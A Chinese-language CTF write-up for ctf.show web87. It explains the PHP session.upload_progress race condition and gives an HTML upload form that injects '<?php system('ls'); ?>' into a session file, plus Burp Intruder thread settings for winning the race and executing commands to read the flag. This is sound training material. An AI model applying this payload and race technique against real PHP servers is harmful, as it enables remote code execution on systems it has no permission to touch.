条件竞争(ctf.show web87)

关于条件竞争:

我们在 Cookie 里设置了 PHPSESSID=test,PHP 将会在服务器上创建一个文件:/tmp/sess_test,但是对于默认配置 session.upload_progress.cleanup = on,文件上传后 session 文件内容会立即被清空。因为开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,但他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术则会发生"竞争条件"问题。我们需要通过条件竞争,在服务器还未来得及删除我们上传的session 文件内容前,成功访问包含到该文件,实现恶意代码的命令执行。

提交表单

html 复制代码
<!DOCTYPE html>
<html>
<body>
<form action="https://9b20724b-c913-4677-87e3-84caf86b15c6.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

写入后更改后缀为.html即可访问,随便上传一个文件。然后抓包放到Intruder模块。

选择我们的Null payloads模式以及无限重复发送

在pool中我们的初始的线程是10

再抓一个初始访问包

一样的我们直接发送到Intruder模块 。

也是一样的设置

但是在Pool中将线程设置为30,就是一定要比之前的线程多。

攻击之后等待一会儿

发现不同长度的包,可以看到我们的条件竞争成功。

然后更改我们的指令抓取flag即可

相关推荐
胡渠洋29 分钟前
postman学习
学习·测试工具·postman
Amazing_Cacao2 小时前
CFCA精品可可产区风土解析(美洲):无情打破风味堆叠假象,建立时间轴上的层次动态阅读系统
学习
数据知道2 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
六点_dn2 小时前
Linux学习笔记-shell运算符
linux·笔记·学习
Gyr02 小时前
关于证书站捡洞这一档事
安全·web安全
其实防守也摸鱼3 小时前
渗透--损坏的对象级别鉴权漏洞(Broken Object Level Authorization, BOLA)
大数据·网络·数据库·学习·tcp/ip·安全·安全威胁分析
铅笔侠_小龙虾3 小时前
Rust 学习(2)-变量、常量与 shadowing
学习·算法·rust
it小生01013 小时前
从底层思维到高效行动,顶尖人才进阶核心修炼指南
学习·学习方法
恣逍信点3 小时前
《凌微经》通俗解读——哲学第一因
学习·职场和发展·创业创新·学习方法·业界资讯·交友·哲学
网安蟹佬霸4 小时前
我国网络安全人才缺口现状、成因与对策研究
安全·web安全